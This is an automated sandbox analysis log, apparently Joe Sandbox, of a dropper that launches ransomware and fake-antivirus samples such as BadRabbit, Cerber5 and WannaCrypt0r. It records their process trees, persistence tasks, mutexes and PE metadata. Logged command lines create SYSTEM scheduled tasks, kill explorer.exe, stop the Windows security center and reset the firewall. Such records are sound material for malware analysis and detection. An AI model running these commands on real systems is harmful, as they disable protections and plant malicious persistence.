          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe"
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit"
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe"
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe"
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1382722661 && exit
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\870F.tmp "C:\Windows\870F.tmp" \\.\pipe\{60F226A4-8E49-484F-BBA1-D3ECC97C63B9}
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Windows\870F.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net start winmgmt
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe"
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net start wscsvc
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\bpkAAJptGv.exe "C:\Users\user\Desktop\bpkAAJptGv.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net start winmgmtJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net start wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe" Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: unknown unknown
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\341C.tmp\302746537.bat" "
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\870F.tmp "C:\Windows\870F.tmp" \\.\pipe\{60F226A4-8E49-484F-BBA1-D3ECC97C63B9}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit"
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_004034AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,12_2_004034AA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E27CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,20_2_04E27CC5
          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;explorer.exe&quot;)
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile created: C:\Users\user\AppData\Local\Temp\4otjesjty.mofJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_0040A9BD OleInitialize,CoCreateInstance,MultiByteToWideChar,OleUninitialize,12_2_0040A9BD
          Source: bpkAAJptGv.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E284EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,20_2_04E284EE
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\884D772C3AD6FDE5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:60:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_01
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeMutant created: \Sessions\1\BaseNamedObjects\6e722db8-b319-4933-9932-314a077920be
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5756:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4880:120:WilError_01
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeMutant created: \Sessions\1\BaseNamedObjects\shell.ipc.{09538580-9BD7-7EC8-C766-79A3BBF51F92}
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeMutant created: \Sessions\1\BaseNamedObjects\AntiVirus Pro 2017_MUTEX
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3344:120:WilError_01
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe, type: DROPPED
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow found: window name: msctls_updown32Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow detected: Number of UI elements: 16
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow detected: Number of UI elements: 51
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value created or modified: HKEY_CURRENT_USER\Control Panel\Mouse MouseHoverTime
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: bpkAAJptGv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: bpkAAJptGv.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe, 00000038.00000000.470518436.0000000000673000.00000002.00000001.01000000.00000023.sdmp, Endermanch@InfinityCrypt.exe.0.dr
          Source: Binary string: c:\Users\PresFox\Documents\Visual Studio 2013\Projects\AdwareBooC\AdwareBooC\obj\Release\AdwareBooC.pdb source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmp
          Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe, 00000038.00000000.471601413.0000000000692000.00000002.00000001.01000000.00000023.sdmp, Endermanch@InfinityCrypt.exe.0.dr
          Source: Binary string: e:\Working Copies\Bundles\Antivirus\Av\release\avt_main.pdb source: Endermanch@Antivirus.exe, 0000000B.00000000.380424832.00000000004AE000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: C:\Users\Kyle\documents\visual studio 2010\Projects\HAPPY ANTIVIRUS\HAPPY ANTIVIRUS\obj\x86\Release\HAPPY ANTIVIRUS.pdb source: Endermanch@HappyAntivirus.exe, 00000027.00000000.461293572.0000000001038000.00000002.00000001.01000000.0000001B.sdmp
          Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Endermanch@AntivirusPlatinum.exe, 0000000C.00000000.384419277.0000000000412000.00000002.00000001.01000000.00000009.sdmp, Endermanch@AntivirusPlatinum.exe, 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmp, Endermanch@AnViPC2009.exe, 0000000E.00000000.393289980.0000000000412000.00000002.00000001.01000000.0000000E.sdmp
          Source: Binary string: e:\pthreads\pthreads.2\pthreadVC2.pdb source: pthreadVC2.dll.14.dr
          Source: Binary string: C:\Users\Anton\Documents\Visual Studio 2013\Projects\p1_p2\Release\p2.pdb source: Endermanch@SecurityDefener2015.exe.0.dr
          Source: Binary string: .cld.cfg.ign.ftm.wdb.gdb.pdb.rmd.zmd.sdb.ldu.ldb.ndu.ndb.mdu.mdb.fp.hdu.hdb.db3.db2.dbcli_tgzload: Can't fdopen() descriptor %d, errno = %d source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmp
          Source: Binary string: C:\Users\Anton\Documents\Visual Studio 2013\Projects\p1_p2\Release\p2.pdb source: Endermanch@SecurityDefener2015.exe.0.dr
          Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000001B.00000000.425021627.0000000000A72000.00000002.00000001.01000000.00000016.sdmp
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00411585 LoadLibraryA,LoadLibraryA,LoadLibraryA,#17,LoadLibraryA,GetProcAddress,FreeLibrary,SHGetMalloc,12_2_00411585
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: section name: .data2
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .wdata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .fdata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .mdata
          Source: Endermanch@SE2011.exe.0.drStatic PE information: section name: .code
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name: .adata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x6d4ce
          Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x363012
          Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ed7f7
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4214c
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xcfabb
          Source: Endermanch@PCDefender.exe.0.drStatic PE information: real checksum: 0x21337 should be: 0xe33fd
          Source: Endermanch@DeriaLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x82848
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23c0c0
          Source: Endermanch@Xyeta.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18075
          Source: Endermanch@AntivirusPlatinum.exe.0.drStatic PE information: real checksum: 0x21337 should be: 0xc4420
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x62e80b
          Source: Endermanch@NavaShield.exe.0.drStatic PE information: real checksum: 0x81831 should be: 0x9bc9b7
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3a0f8
          Source: Endermanch@WinlockerVB6Blacksod.exe.0.drStatic PE information: real checksum: 0x1676f6 should be: 0x26f735
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xc7a3e
          Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1624e8
          Source: bpkAAJptGv.exeStatic PE information: real checksum: 0x0 should be: 0x2bd83
          Source: Endermanch@Krotten.exe.0.drStatic PE information: real checksum: 0x13aae should be: 0xee00
          Source: Endermanch@Antivirus.exe.0.drStatic PE information: real checksum: 0x200061 should be: 0x206fc7
          Source: Endermanch@InfinityCrypt.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3cd67
          Source: Endermanch@Birele.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22594
          Source: Endermanch@SecurityDefender.exe.0.drStatic PE information: real checksum: 0x1797c0 should be: 0x1762de
          Source: Endermanch@SE2011.exe.0.drStatic PE information: real checksum: 0x271eac should be: 0x26a7fe
          Source: Endermanch@SmartDefragmenter.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x789b3
          Source: Endermanch@LPS2019.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x12a4ca
          Source: Fantom.exe.0.drStatic PE information: real checksum: 0x23bfb should be: 0x42811
          Source: Endermanch@SecurityDefener2015.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x137242
          Source: Endermanch@AnViPC2009.exe.0.drStatic PE information: real checksum: 0x236e4 should be: 0x12f8ba
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\__tmp_rar_sfx_access_check_24666781Jump to behavior
          Source: initial sampleStatic PE information: section name: .text entropy: 7.958847217230676
          Source: initial sampleStatic PE information: section name: .text entropy: 7.3467930766155956
          Source: initial sampleStatic PE information: section name: .text entropy: 7.193641199482148
          Source: initial sampleStatic PE information: section name: .text entropy: 7.995168937044817
          Source: initial sampleStatic PE information: section name: .text entropy: 7.848405878864468
          Source: initial sampleStatic PE information: section name: .text entropy: 7.914448567969065
          Source: initial sampleStatic PE information: section name: entropy: 7.9958918474030645
          Source: initial sampleStatic PE information: section name: entropy: 7.994235618092612
          Source: initial sampleStatic PE information: section name: entropy: 7.636979274606437
          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.996124045562077
          Source: initial sampleStatic PE information: section name: .data entropy: 7.737096645949357
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
